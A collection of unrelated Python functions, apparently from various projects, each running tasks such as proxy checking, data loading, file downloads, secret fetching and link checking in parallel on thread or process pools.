def simple_parallel():
    """Sum four hard-coded integer lists on a four-worker pool and print the sums."""
    workers = Pool(4)
    totals = workers.map(sum, [[2, 3, 5], [5, 5, 5], [2], [3, 3]])
    # Stop accepting tasks, then wait for the workers to finish.
    workers.close()
    workers.join()
    print(totals)
def createDemo(self):
    """Create 1000 demo customer accounts through ``self.createUser``.

    Every payload carries pseudo-random ``first``/``last``/``email`` values
    (ten hex characters taken from a SHA-224 digest fed with random numbers),
    a sequential ``tel`` starting at 8005550000, and the same shared
    ``Event`` instance. The payloads are handed to ``self.createUser`` on a
    pool of five worker threads; the pool is always closed and joined.
    """
    event = Event()
    usersData = []
    for i in range(1000):
        digest = hashlib.sha224()
        # hashlib needs bytes on Python 3; encoding an ASCII str is a no-op
        # on Python 2, so the digest is the same on both.
        digest.update('{}'.format(random.random()).encode('utf-8'))
        first = 'first{}'.format(digest.hexdigest()[0:10])
        digest.update('{}'.format(random.random()).encode('utf-8'))
        # ``last`` and ``email`` intentionally share the same digest prefix.
        suffix = digest.hexdigest()[0:10]
        usersData.append({
            'first': first,
            'last': 'last{}'.format(suffix),
            'tel': '{}'.format(8005550000 + i),
            'email': 'email{}@localhost.email'.format(suffix),
            'pass': '******',
            'type': 'customer',
            'event': event,
        })

    # Only one pool is created: the original built a cpu_count()*2 pool and
    # immediately replaced it with this one, leaking the first pool's threads.
    pool = ThreadPool(5)
    try:
        pool.map(self.createUser, usersData)
    finally:
        pool.close()
        pool.join()
def parallel_bulk(client, actions, thread_count=4, chunk_size=500,
                  max_chunk_bytes=100 * 1024 * 1024,
                  expand_action_callback=expand_action, **kwargs):
    """
    Parallel version of the bulk helper run in multiple threads at once.

    This is a generator: it yields the items produced for each chunk, in
    chunk order. The thread pool is closed and joined when the generator is
    exhausted, closed early, or fails.

    :arg client: instance of :class:`~elasticsearch.Elasticsearch` to use
    :arg actions: iterator containing the actions
    :arg thread_count: size of the threadpool to use for the bulk requests
    :arg chunk_size: number of docs in one chunk sent to es (default: 500)
    :arg max_chunk_bytes: the maximum size of the request in bytes (default: 100MB)
    :arg raise_on_error: raise ``BulkIndexError`` containing errors (as `.errors`)
        from the execution of the last chunk when some occur. By default we raise.
    :arg raise_on_exception: if ``False`` then don't propagate exceptions from
        call to ``bulk`` and just report the items that failed as failed.
    :arg expand_action_callback: callback executed on each action passed in,
        should return a tuple containing the action line and the data line
        (`None` if data line should be omitted).
    """
    # Avoid importing multiprocessing unless parallel_bulk is used
    # to avoid exceptions on restricted environments like App Engine
    from multiprocessing.dummy import Pool

    actions = map(expand_action_callback, actions)
    pool = Pool(thread_count)
    try:
        for result in pool.imap(
            lambda chunk: list(_process_bulk_chunk(client, chunk, **kwargs)),
            _chunk_actions(actions, chunk_size, max_chunk_bytes,
                           client.transport.serializer)
        ):
            for item in result:
                yield item
    finally:
        # Runs on normal exhaustion, on an exception, and on generator.close(),
        # so the worker threads are never left behind.
        pool.close()
        pool.join()
def check_and_rank_ip(session):
    """Probe every stored proxy IP against the JD search endpoint and rank it.

    Each ``IP`` row is used as a proxy for one POST request (5 s timeout).
    When the response body parses as JSON, ``rank`` becomes the elapsed time
    in hundredths of a second; on any failure ``rank`` becomes ``None``.
    Rows whose rank is ``None`` are then deleted and the session committed.

    :param session: database session used to query, update and delete ``IP`` rows
    :return: number of ``IP`` rows remaining after the cleanup
    """
    def ping_jd(ip):
        started = time.time()
        try:
            body = requests.post(
                'http://so.m.jd.com/ware/searchList.action',
                data={'_format_': 'json', 'stock': 1, 'page': 1, 'keyword': '手机'},
                proxies=ip.to_proxy(),
                timeout=5,
            ).content
            json.loads(body)
            ip.rank = int(100 * (time.time() - started))
        except Exception:
            # Best effort: any failure simply marks the proxy as dead.
            ip.rank = None
        return ip

    print('%s %s' % (datetime.now(), '开始判断ip活性'))
    from multiprocessing.dummy import Pool as ThreadPool

    candidates = session.query(IP).all()
    pool = ThreadPool(100)
    for checked in pool.map(ping_jd, candidates):
        session.add(checked)
    # ``== None`` is intentional: it is a query expression, not a Python
    # identity test, so it must not be rewritten as ``is None``.
    session.query(IP).filter(IP.rank == None).delete()
    session.commit()
    pool.close()
    pool.join()
    return session.query(IP).count()
def run():
    """Create all configured entities, reporting progress in 5% steps.

    For every ``(entity, factory)`` pair, ``settings[entity]`` tasks are run
    through ``factory`` on a pool of ``settings['num_threads']`` threads.
    Progress is logged via ``log.print_out`` the first time each multiple of
    5% (5..100) is reached. On any exception the error is printed, the pool
    is terminated and the process exits with status 1.
    """
    jobs = [
        ('users', User().create),
        ('forums', Forum().create),
        ('threads', Thread().create),
        ('posts', Post().create),
        ("followers", User().follow),
        ("subscribptions", Thread().subscribe),
    ]
    for entity, factory in jobs:
        num_tasks = int(settings[entity])
        entities = [True] * num_tasks
        pool = ThreadPool(int(settings['num_threads']))
        try:
            pending = set(range(5, 105, 5))
            # Count completed tasks from 1 so the final task reports 100%;
            # the zero-based index used before could never reach it.
            for done, _ in enumerate(pool.imap(factory, entities), 1):
                perc = done * 100 // num_tasks
                if perc in pending:
                    log.print_out('Creating %s: %d%% done' % (entity, perc))
                    pending.discard(perc)
            pool.close()
            pool.join()
        except Exception as e:
            print(e)
            pool.terminate()
            sys.exit(1)
def get_offline_user_data():
    """Refresh data for active offline users that have no queued hourly job.

    Does nothing when the ``api_error_info`` key exists or when the current
    minute is before :50. Otherwise the user records for the names returned
    by the ``sdiff`` call are loaded, inactive users and users with a
    ``user:<name>:cron_queued`` key are skipped, and ``get_data`` is run for
    the remaining usernames on a pool of five threads.
    """
    if DEBUG_MODE:
        print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'get_offline_user_data')
    if r_session.exists('api_error_info'):
        return
    if datetime.now().minute < 50:
        return

    offline_names = r_session.sdiff('users', *r_session.smembers('global:online.users'))
    user_keys = ['user:%s' % name.decode('utf-8') for name in offline_names]
    if not user_keys:
        # mget() requires at least one key; nothing to do without offline users.
        return

    offline_users = []
    for b_user in r_session.mget(*user_keys):
        if b_user is None:
            # The name is in the set but its user record is missing.
            continue
        user_info = json.loads(b_user.decode('utf-8'))
        username = user_info.get('username')
        if not user_info.get('active'):
            continue
        every_hour_key = 'user:%s:cron_queued' % username
        if r_session.exists(every_hour_key):
            continue
        offline_users.append(username)

    if not offline_users:
        return
    pool = ThreadPool(processes=5)
    try:
        pool.map(get_data, offline_users)
    finally:
        pool.close()
        pool.join()
def main():
    """Collect per-member file quota usage for a Dropbox Business team.

    Prompts for the API token, sets the module globals ``fileQuota`` and
    ``dbxApiV2``, fetches the member list, measures quota usage for every
    member that is not merely invited (in ``args.threads`` threads) and
    writes the result with ``dumpCsvFile``.
    """
    global fileQuota, dbxApiV2

    dfbToken = raw_input('Enter your Dropbox Business API App token (Team Member File Access permission): ')

    if args.verbose:
        dumpArguments()

    fileQuota = args.quota * UNITS[args.units]

    log("Creating Dropbox V2 API Client")
    dbxApiV2 = DbxApi(DbxApi.DBX_API_V2, dfbToken)

    log("Collecting Member List...")
    members = getDfbMembers(None)

    # Invited members can't consume any quota yet, so leave them out.
    activeMembers = []
    for member in members:
        if member.status != "invited":
            activeMembers.append(member)

    summary = "Got {} total team members ({} active, {} suspended, {} invited)".format(
        len(members),
        len(activeMembers),
        len(getMemberSublist(members, "suspended")),
        len(getMemberSublist(members, "invited")),
    )
    log(summary)

    log("Collecting file quota information - this may take a while...")
    workers = ThreadPool(args.threads)
    members = workers.map(getFileQuotaUsage, activeMembers)
    workers.close()
    workers.join()

    # Write final output
    log("Processing complete, writing output to {}".format(args.output.name))
    dumpCsvFile(members)
def load_rowdata_to_mongo_zh(is_incremental):
    """Load the per-dimension row-data files into the MongoDB dataset collection.

    :param is_incremental: when falsy, the dataset collection is dropped
        before loading; when truthy, existing documents are kept.

    Every regular file in the "by dimension" output folder is passed to
    ``insert_by_dim`` on a pool of 12 threads, together with a shared
    ``counter`` list, the collection and the start timestamp.
    """
    print("start loading row data(zh) from JSON file to MongoDB...")
    all_start = timeit.default_timer()

    static = Static()
    bydim_dir = static.output_folder + static.dataset_bydim_folder
    client = MongoClient(static.mongo_url, static.mongo_port)
    dataset_col = client[static.database_name][static.dataset_col_name]
    if not is_incremental:
        dataset_col.drop()

    # Keep regular files only; sub-directories are ignored.
    candidates = (os.path.join(bydim_dir, entry) for entry in os.listdir(bydim_dir))
    file_path_array = [path for path in candidates if os.path.isfile(path)]
    print(str(len(file_path_array)) + " files are loaded")

    counter = []
    mapfunc = partial(insert_by_dim, counter=counter, dataset_col=dataset_col,
                      all_start=all_start)
    workers = ThreadPool(12)
    workers.map(mapfunc, file_path_array)
    workers.close()
    workers.join()

    print("All the threads are completed. Total number is " + str(len(counter)) + "\n")
    elapsed = round(timeit.default_timer() - all_start)
    print("total time cost: " + str(elapsed) + 's')
def run(threads):
    """Fetch a fixed list of python.org-related URLs in parallel and report the size.

    :param threads: number of worker threads in the pool

    Each URL is requested (with a request body, so as a POST) and its body is
    decoded as UTF-8; the printed total is the sum of the decoded lengths.
    Every response is closed as soon as it has been read.
    """
    urls = [
        'http://www.python.org',
        'http://www.python.org/about/',
        'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
        'http://www.python.org/doc/',
        'http://www.python.org/download/',
        'http://www.python.org/getit/',
        'http://www.python.org/community/',
        'https://wiki.python.org/moin/',
        'http://planet.python.org/',
        'https://wiki.python.org/moin/LocalUserGroups',
        'http://www.python.org/psf/',
        'http://docs.python.org/devguide/',
        'http://www.python.org/community/awards/'
    ]
    # NOTE(review): PROTOCOL_TLSv1 is kept from the original; confirm whether
    # a newer protocol / default context is acceptable for these hosts.
    scontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    headers = {'User-Agent': ' Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'}

    def fetch_length(url):
        """Download one URL and return the length of its decoded body."""
        request = urllib.request.Request(url=url, data=b'None', headers=headers)
        # The context manager closes the response (and its socket) promptly.
        with urllib.request.urlopen(request, context=scontext) as response:
            return len(response.read().decode('utf-8'))

    pool = ThreadPool(threads)
    try:
        dataLen = pool.map(fetch_length, urls)
    finally:
        pool.close()
        pool.join()
    print(threads, 'поток(ов), прочитано', sum(dataLen), 'байт')
def parse_films_infomation(item):
    """Store one film's metadata and download its sample images.

    :param item: sequence where ``item[0]`` is the title, ``item[1]`` the
        film info strings, ``item[3]`` the magnet rows (each a sequence of
        strings) and ``item[4]`` the sample image URLs. ``item[2]`` (the
        cover URL) is not used here.

    A directory named after the title (with ``*``, ``/`` and ``:`` removed)
    is created in the current working directory; ``film_tag.txt`` and
    ``magnent.txt`` are written there and the sample images are fetched with
    ``download`` on 12 threads. The previous working directory is restored
    even if writing or downloading fails.
    """
    title_deal = item[0].replace('*', '').replace('/', '').replace(':', '')
    film_info = item[1]
    magnent_container = item[3]
    sample_images_urls = item[4]

    previous_dir = os.getcwd()
    os.mkdir(title_deal)
    os.chdir(title_deal)
    try:
        with open('film_tag.txt', 'w+', encoding='utf-8') as tag_file:
            for piece in film_info:
                tag_file.write(piece)

        with open('magnent.txt', 'w+', encoding='utf-8') as magnet_file:
            for per_list in magnent_container:
                # Every field is followed by a space, one row per line.
                magnet_file.write(''.join(field + ' ' for field in per_list) + '\n')

        # Download the sample images with a thread pool.
        child_pool = ThreadPool(12)
        try:
            child_pool.map(download, sample_images_urls)
        finally:
            child_pool.close()
            child_pool.join()
    finally:
        # Without this a failure would leave the process inside the film
        # directory, so the next film would be nested under it.
        os.chdir(previous_dir)
def build_words_weight():
    """Recompute and save ``words_weight`` for every ``BigVs`` row.

    For each row the share of correct posted results is scaled to a
    200-sample baseline, the judgement counts are added on top (``'right'``
    judgements count as correct), and the resulting percentage is stored as
    an integer. Rows are processed on a pool of eight workers and the total
    run time is passed to ``debug``.
    """
    started = time.time()
    bigvs = BigVs.objects.all()

    def _build(b):
        w = 0
        c = 0
        sum_c = 0

        # Posted-result counts grouped by ``is_correct`` (0 or 1).
        posted = (ArticlePostedResults.active_objects
                  .filter(bigv__v_id=b.v_id, is_correct__in=(0, 1))
                  .values('is_correct')
                  .annotate(count=Count('is_correct'))
                  .order_by('is_correct'))
        for row in posted:
            if row['is_correct'] == 1:
                c = row['count']
            sum_c += row['count']
        if sum_c:
            # Normalise the posted results to a fixed weight of 200 samples.
            w = c * 1.0 / sum_c
            c = w * 200
            sum_c = 200

        # Judgement counts grouped by verdict.
        judged = (Judgement.objects
                  .filter(article__bigv=b, judge__isnull=False)
                  .values('judge')
                  .annotate(count=Count('judge'))
                  .order_by('judge'))
        for row in judged:
            if row['judge'] == 'right':
                c += row['count']
            sum_c += row['count']
        if sum_c:
            w = int(round(c * 1.0 / sum_c * 100))

        b.words_weight = w
        b.save()
        print('%s %s %s %s' % (b.name, c, sum_c, w))

    workers = Pool(8)
    workers.map(_build, bigvs)
    workers.close()
    workers.join()
    finished = time.time()
    debug('build_words_weight', finished - started)
def test_multi_threading():
    """Run the same small pipeline concurrently with pool sizes 20..199.

    Three operations with random short sleeps are composed into one
    pipeline; ``infer`` runs it with fixed inputs and asserts that exactly
    the requested outputs come back. Each pool is closed and joined before
    the next, larger pool is created.
    """
    import time
    import random
    from multiprocessing.dummy import Pool

    def op_a(a, b):
        time.sleep(random.random() * .02)
        return a + b

    def op_b(c, b):
        time.sleep(random.random() * .02)
        return c + b

    def op_c(a, b):
        time.sleep(random.random() * .02)
        return a * b

    pipeline = compose(name="pipeline", merge=True)(
        operation(name="op_a", needs=['a', 'b'], provides='c')(op_a),
        operation(name="op_b", needs=['c', 'b'], provides='d')(op_b),
        operation(name="op_c", needs=['a', 'b'], provides='e')(op_c),
    )

    def infer(i):
        # ``i`` is only the task index supplied by pool.map; inputs are fixed.
        outputs = ["c", "d", "e"]
        results = pipeline({"a": 1, "b": 2}, outputs)
        assert tuple(sorted(results.keys())) == tuple(sorted(outputs)), (outputs, results)
        return results

    N = 100
    for pool_size in range(20, 200):
        pool = Pool(pool_size)
        try:
            pool.map(infer, range(N))
        finally:
            # join() was missing: without it up to 180 pools' worth of
            # worker threads could still be alive when the test returns.
            pool.close()
            pool.join()
def load(cls, docs, ignore_errors=False):
    """Force load the provided docs to read from file system.

    :param docs: sequence of docs; nothing happens when it is empty or None
    :param ignore_errors: when true, ``BadFormatError`` raised while reading
        a doc is swallowed; otherwise it propagates
    :return: None

    Docs are loaded sequentially when no ``ThreadPool`` is available or when
    there are fewer than ``cls.MIN_POOL_COUNT`` docs; otherwise a thread pool
    of ``min(cls.MAX_POOL_SIZE, len(docs) * cls.POOL_RATIO)`` threads (at
    least one) is used and always cleaned up.
    """
    if not docs:
        return

    pod = docs[0].pod

    def load_func(doc):
        """Force the doc to read the source file."""
        try:
            # pylint: disable=pointless-statement
            doc.has_serving_path()  # Using doc fields forces file read.
        except document_front_matter.BadFormatError:
            if not ignore_errors:
                raise

    with pod.profile.timer('DocsLoader.load'):
        if ThreadPool is None or len(docs) < cls.MIN_POOL_COUNT:
            for doc in docs:
                load_func(doc)
            return

        pool_size = min(cls.MAX_POOL_SIZE, len(docs) * cls.POOL_RATIO)
        # A small ratio can round down to 0, which ThreadPool rejects.
        pool_size = max(1, int(round(pool_size)))
        thread_pool = ThreadPool(pool_size)
        try:
            # Loop results to make sure that the threads are all processed
            # (and that any worker exception is re-raised here).
            for _ in thread_pool.imap_unordered(load_func, docs):
                pass
        finally:
            thread_pool.close()
            thread_pool.join()
def Producer():
    """Open two fixed URLs on a four-thread pool and print the elapsed time."""
    targets = ['http://www.taobao.com', 'http://www.sina.com.cn']
    start_time = time.time()

    # Each URL is opened in its own worker thread.
    workers = ThreadPool(4)
    results = workers.map(urllib2.urlopen, targets)

    # Close the pool and wait for the work to finish.
    workers.close()
    workers.join()
    print("Done! time Taken() " + format(time.time() - start_time))
def collect_crystal():
    """Run ``check_collect`` for every stored auto-collect cookie.

    The members of the ``global:auto.collect.cookies`` set are decoded from
    UTF-8 JSON and processed on a pool of five threads.
    """
    print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'collect_crystal')
    workers = ThreadPool(processes=5)
    raw_cookies = r_session.smembers('global:auto.collect.cookies')
    cookies = [json.loads(raw.decode('utf-8')) for raw in raw_cookies]
    workers.map(check_collect, cookies)
    workers.close()
    workers.join()
def create_all_preflop_two_hand_equity(verbose=False, save=False, distributed=False, nb_process=4):
    """returns preflop_two_hand_equity for all two hand preflop combinations

    :param verbose: in the sequential path, show a one-line progress counter
    :param save: pickle the result to ``Tables/all_preflop_two_hand_equity.pk``
    :param distributed: compute on a thread pool instead of sequentially
    :param nb_process: pool size used when ``distributed`` is true
    :return: list with one ``preflop_two_hand_equity`` result per entry of
        the module-level ``all_preflop_two_hands``
    """
    print('\n--------------- start create_all_preflop_two_hand_equity')
    print('all preflop two hands = \nstart = {}\nend = {}\nnb of elements = {}'.format(
        all_preflop_two_hands[:5], all_preflop_two_hands[-5:], len(all_preflop_two_hands)))

    hands = all_preflop_two_hands[:]
    t0 = timer()
    if distributed:
        pool = ThreadPool(nb_process)
        try:
            equity = pool.map(preflop_two_hand_equity, hands)
        finally:
            pool.close()
            pool.join()
    else:
        equity = []
        total = len(hands)
        for k, p in enumerate(hands, 1):
            if verbose:
                # write() takes a single string; the hand used to be passed as
                # a second argument, which raised TypeError in verbose mode.
                sys.stdout.write('\rk=%5d / %5d : %s' % (k, total, p))
                sys.stdout.flush()
            equity.append(preflop_two_hand_equity(p))
    t1 = timer()

    print('all_preflop_two_hand_equity time = {:9.4f} s'.format(t1 - t0))
    print('exact number of distinct (rankwise) pairs of preflop hands = {}'.format(
        np.array([len(e) for e in equity]).sum()))

    if save:
        path = os.path.join('Tables', 'all_preflop_two_hand_equity.pk')
        # The context manager guarantees the pickle is flushed and closed.
        with open(path, 'wb') as handle:
            cPickle.dump(equity, handle)
        print('{} saved to disk as {}'.format('equity', path))
    return equity
def make_unaligned_fasta(dnaDirectory, groupsDict):
    """Write one unaligned FASTA file per group from the sequences in a directory.

    Reads through files in provided directory to find gene sequences that
    match the proteins in the groups dictionary.

    :param dnaDirectory: directory whose files are parsed as FASTA
    :param groupsDict: maps a group name to entries of the form
        ``"<seqID>|<record id>"``
    :return: the list of seqIDs of the first group returned by the pool
        (raises IndexError when ``groupsDict`` is empty)

    Files are written to ``proteinAlignments/<group>.fasta`` using
    ``args.threads`` worker threads.
    """
    print("Collecting core genes")

    def make_fasta(group):
        """Write the records of one group and return its seqIDs."""
        records = []
        seqIDs = []
        for protein in groupsDict[group]:
            parts = protein.split('|')
            seqIDs.append(parts[0])
            records.append(seqRecordDict[parts[1]])
        # Closing the handle ensures the FASTA is completely written to disk.
        with open('proteinAlignments/' + group + '.fasta', 'w') as out:
            SeqIO.write(records, out, 'fasta')
        return seqIDs

    try:
        os.makedirs("proteinAlignments")
    except OSError:
        if not os.path.isdir("proteinAlignments"):
            raise

    # Index every sequence in the directory by record id.
    seqRecordDict = {}
    for f in listdir_fullpath(dnaDirectory):
        with open(f, 'r') as handle:
            for record in SeqIO.parse(handle, 'fasta'):
                seqRecordDict[record.id] = record

    pool = ThreadPool(args.threads)
    try:
        seqIDs = pool.map(make_fasta, list(groupsDict.keys()))
    finally:
        pool.close()
        pool.join()
    return seqIDs[0]
def simTrans(hosts, prm):
    """Start an iperf server on every host, run the per-node procedure, then stop iperf.

    :param hosts: host objects providing ``name``, ``IP()`` and ``cmdPrint()``
    :param prm: parameters providing ``n``, ``data_size`` and ``pipes``

    Each host's previous result file is removed, the module-level ``status``
    and ``ip`` tables are initialised, and ``perNodeProc`` is run for every
    ``(host, prm)`` pair on a pool of 50 threads. Host ``h1`` is marked as
    the start node by setting all of its pipe states to 2.
    """
    fname = '{}nodes.{}MB.{}pipes.out'.format(prm.n, prm.data_size, prm.pipes)

    for h in hosts:
        host_number = int(h.name.split('h')[1])
        full_name = "results/%04d/%s" % (host_number, fname)
        os.system("rm %s" % full_name)
        status[h.name] = [0] * prm.pipes
        ip[h.name] = h.IP()
        h.cmdPrint('iperf -s -f M >> %s &' % full_name)

    print(neib)
    status['h1'] = [2] * prm.pipes  # start node
    print(status)

    jobs = [(h, prm) for h in hosts]
    workers = ThreadPool(50)
    workers.map(perNodeProc, jobs)
    workers.close()
    workers.join()

    for h in hosts:
        h.cmdPrint('kill %iperf')
def grab_everything():
    """Fetch the content of every blog node link in parallel.

    :return: list of ``grab_blog_content`` results, in the order of the
        links returned by ``grab_blog_node_links``
    """
    links = grab_blog_node_links()
    workers = ThreadPool(cpu_count())
    contents = workers.map(grab_blog_content, links)
    # No more work is coming; wait for the threads to finish.
    workers.close()
    workers.join()
    return contents
def _download_all(items):
    """Async download of the files.

    Example: [(url, quality, file_path)]

    Every item is passed to ``dl`` on a thread pool while a tqdm progress
    bar tracks completion. At most ``WORKERS`` threads are used, and never
    more than one thread per item. Nothing happens for an empty ``items``.
    """
    if not items:
        return

    # Don't start more workers than 1:1. The previous check was inverted
    # (it *raised* the count to len(items)) and overwrote the WORKERS global;
    # the limit is now computed locally and the global is left untouched.
    workers = max(1, min(WORKERS, len(items)))
    pool = ThreadPool(workers)
    chunks = 1  # TODO
    # 1 ffmpeg is normally 10x- 20x * 2500kbits ish
    # so depending on how many items you download and
    # your bandwidth you might need to tweak chunk
    results = pool.imap_unordered(dl, items, chunks)
    try:
        for _ in tqdm.tqdm(results, total=len(items)):
            pass
    finally:
        pool.close()
        pool.join()
def dns_resolver(filename, dst="mail.txt"):
    """Verify every line of ``filename`` and write the distinct hits to ``dst``.

    :param filename: input file; each line is passed to ``verify_domain``
    :param dst: output file receiving each distinct truthy result
    :return: None. A message is printed and nothing else happens when either
        file cannot be opened.
    """
    try:
        with open(filename, 'r') as fd:
            lines = fd.readlines()
    except (IOError, OSError):
        print('can not open the file: %s' % filename)
        return

    try:
        fd_write = open(dst, 'w')
    except (IOError, OSError):
        print('error in open %s' % dst)
        return

    with fd_write:
        thread_num = 2
        pool = ThreadPool(thread_num)
        try:
            results = pool.map(verify_domain, lines)
        finally:
            pool.close()
            pool.join()

        # De-duplicate and drop empty results.
        for line in set(results):
            if line:
                # The file object itself used to be called here, which
                # raised TypeError instead of writing the line.
                fd_write.write(line)
def main():
    """Check a LegalOne application for broken links.

    Logs in, tests the contacts search page and then keeps testing queued
    pages in batches of at most ``--threads`` links until the queue is
    empty. ``test_url`` receives the queue, presumably to enqueue the links
    it discovers (its implementation is not visible here).
    """
    parser = argparse.ArgumentParser(description='Checks a LegalOne application for broken links')
    parser.add_argument('-d', '--domain', help='URL to check for broken links. Ex. http://colucci.release.dco.novajus.com.br', required=True)
    parser.add_argument("-e", '--escritorio', help='Account to check for broken links, Ex. xxxx, where xxx.release.dco.novajus.com.br', required=True)
    parser.add_argument("-l", '--loginpage', help='URL to login on the application. Ex. http://release.dco.novajus.com.br/conta/login', required=True)
    parser.add_argument("-t", '--threads', type=int, help='How many threads sarching for broken links at the same time. Default is 10', required=False, default=10)
    args = parser.parse_args()

    loginpage = args.loginpage
    escritorio = args.escritorio
    domain = args.domain
    threads = args.threads

    pages_to_test = queue.Queue(maxsize=0)
    cookie_login = login(domain, escritorio, loginpage)
    pages_to_test.put(domain + "/contatos/contatos/search")
    test_url(cookie_login, pages_to_test, domain, pages_to_test.get())

    partialtest_url = partial(test_url, cookie_login, pages_to_test, domain)
    while not pages_to_test.empty():
        # Take up to ``threads`` links without blocking: a blocking get()
        # hangs forever when fewer than ``threads`` pages are queued.
        links_to_check = []
        for _ in range(threads):
            try:
                links_to_check.append(pages_to_test.get_nowait())
            except queue.Empty:
                break

        pool = ThreadPool(threads)
        try:
            pool.map(partialtest_url, links_to_check)
        finally:
            pool.close()
            pool.join()
def main():
    """Request every icon of every font from a server using a worker pool.

    The server URL is taken from the command line; ``http://`` is prepended
    when it has no ``http://`` or ``https://`` scheme. One URL of the form
    ``<server>/icon/<font_id>/000/<char>`` is built per character and the
    sorted ``(font_id, char, url)`` tuples are passed to ``check_icon``.
    When ``MAX_ICONS`` is set only the first ``MAX_ICONS`` icons are checked.
    """
    parser = argparse.ArgumentParser(usage='%(prog)s [options] SERVER_URL',
                                     description=__doc__)
    parser.add_argument(
        '-t', '--threads',
        help='Number of threads (simultaneous connections)',
        dest='threads', default=1, type=int)
    parser.add_argument('server', help='URL of server')
    args = parser.parse_args()

    server = args.server
    # Accept both schemes; "https://host" used to become "http://https://host".
    if not server.startswith(('http://', 'https://')):
        server = 'http://{}'.format(server)
    base_url = server.rstrip('/')

    icons = []
    for font_id, font in fonts.items():
        for char in font['characters']:
            # URLs always use "/", so join explicitly rather than with
            # os.path.join, which follows the local platform's separator.
            url = '/'.join((base_url, 'icon', font_id, '000', char))
            icons.append((font_id, char, url))
    icons.sort()

    print('{} icons to test on {} ...'.format(len(icons), args.server))

    if MAX_ICONS:
        icons = icons[:MAX_ICONS]

    pool = Pool(args.threads)
    try:
        pool.map(check_icon, icons)
    finally:
        pool.close()
        pool.join()
def e_cal(l, cores):
    '''
    Calculate e as a Decimal with ``l`` digits of precision.

    Factorials are computed ``cores`` at a time on a process pool, their
    ``one_div`` results are summed into the running total, and a loop
    counter is printed after every batch. The loop stops when a batch no
    longer changes the total at the current precision. The module-level
    ``LOOPS`` counter is incremented once per batch.

    Returns the value of e.
    '''
    global LOOPS
    p = Pool()
    getcontext().prec = l

    e = Decimal(0)
    previous = 0
    start = 0
    batches = 0
    while True:
        # Factorials of the next ``cores`` integers, computed in parallel.
        factorials = p.map(math.factorial, range(start, start + cores))
        # Add the one_div result of each factorial to the running total.
        e += sum(p.map(one_div, factorials))
        start += cores
        batches += 1
        LOOPS += 1
        sys.stdout.write("\r%i loops passed." % (batches))  # loop status
        sys.stdout.flush()
        if e == previous:
            break
        previous = e

    sys.stdout.write("\r%i loops passed.\n" % (batches))
    print(start)
    p.close()
    p.join()
    return e
def multiRunuser():
    """Run ``runuser`` for every entry of the global ``ip_list`` in parallel.

    The ``AsyncResult`` returned by ``map_async`` is stored in the global
    ``results``; the function returns after all workers have finished.
    """
    global ip_list, results
    workers = ThreadPool(cpu_count() * 8)
    results = workers.map_async(runuser, ip_list)
    # close() + join() blocks until every submitted task has completed.
    workers.close()
    workers.join()
def getAllSecrets(version="", region=None, table="credential-store",
                  context=None, credential=None, session=None, **kwargs):
    '''
    fetch and decrypt all secrets

    :param credential: optional name pattern; when it contains
        ``WILDCARD_CHAR`` only the matching secret names are fetched
    :param session: existing session to reuse; one is created from
        ``kwargs`` when omitted
    :return: dict mapping each secret name to its ``getSecret`` result
        (an empty dict when no secret matches)
    '''
    if session is None:
        session = get_session(**kwargs)
    dynamodb = session.resource('dynamodb', region_name=region)
    kms = session.client('kms', region_name=region)
    secrets = listSecrets(region, table, **kwargs)

    # Only return the secrets that match the pattern in `credential`
    # This already works out of the box with the CLI get action,
    # but that action doesn't support wildcards when using as library
    if credential and WILDCARD_CHAR in credential:
        names = set(expand_wildcard(credential,
                                    [x["name"] for x in secrets]))
    else:
        names = set(x["name"] for x in secrets)

    if not names:
        # ThreadPool(0) raises ValueError, so handle "no secrets" up front.
        return {}

    # Freeze the order once so names and results are zipped consistently.
    ordered_names = list(names)
    pool = ThreadPool(min(len(ordered_names), THREAD_POOL_MAX_SIZE))
    try:
        results = pool.map(
            lambda name: getSecret(name, version, region, table, context,
                                   dynamodb, kms, **kwargs),
            ordered_names)
    finally:
        pool.close()
        pool.join()
    return dict(zip(ordered_names, results))
def eval_dir(fn, files_list):
    """Apply ``fn`` to every file on ``WORKER_NUM`` threads and sum the results.

    :param fn: callable taking one entry of ``files_list``
    :param files_list: iterable of inputs for ``fn``
    :return: ``sum`` of all values returned by ``fn``
    """
    workers = ThreadPool(WORKER_NUM)
    per_file = workers.map(fn, files_list)
    # Shut the pool down once all results have been collected.
    workers.close()
    workers.join()
    return sum(per_file)
def get_proxy(self):
    """Parse the proxy list, check every proxy on eight threads, return the checked ones.

    :return: ``self.checked_proxies`` after ``self._check_proxy`` has run
        for every entry of ``self.proxies``
    """
    self._parse_proxy()
    workers = ThreadPool(8)
    workers.map(self._check_proxy, self.proxies)
    # Wait for all checks to finish before handing back the result.
    workers.close()
    workers.join()
    return self.checked_proxies
def get_proxys(file_name, thread_num=5):
    """Read ``ip port`` lines from a file, test them and return the working proxies.

    The file content may be data copied from cn-proxy.com: every line that
    starts with a dotted IPv4 address is expected to hold the IP and the
    port as its first two whitespace-separated fields.

    :param file_name: path of the proxy list
    :param thread_num: number of threads used to run ``test_connection``
    :return: de-duplicated list of truthy ``test_connection`` results,
        sorted by their first dot-separated component; an empty list when
        anything goes wrong (the error is printed)
    """
    proxys = []
    ip_reg = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', re.I)
    try:
        with open(file_name, 'r') as fd_proxy:
            for line in fd_proxy:
                line = line.strip()
                if not line:
                    continue
                print('line %s' % line)
                if ip_reg.match(line):
                    fields = line.split()
                    proxy = '%s:%s' % (fields[0], fields[1])
                    print('proxy %s' % proxy)
                    proxys.append(proxy)

        pool = ThreadPool(thread_num)
        try:
            results = pool.map(test_connection, proxys)
        finally:
            pool.close()
            pool.join()

        # Drop failed checks (falsy results) before sorting; a None result
        # would otherwise break the sort key.
        working = [item for item in set(results) if item]
        proxys = sorted(working, key=lambda x: x.split(".")[0])
    except Exception as e:
        print('error %s' % (e,))
        return []
    # The verified list used to be computed and then discarded.
    return proxys
def parallel_runner(args):
    """Run ``run_cmd`` once per input file and print the list of results.

    :param args: object providing ``parallel`` (pool size) and ``file``
        (iterable of files); each task receives the tuple ``(args, file)``
    """
    workers = ThreadPool(args.parallel)
    jobs = [(args, path) for path in args.file]
    result = workers.map(run_cmd, jobs)
    workers.close()
    workers.join()
    print(result)
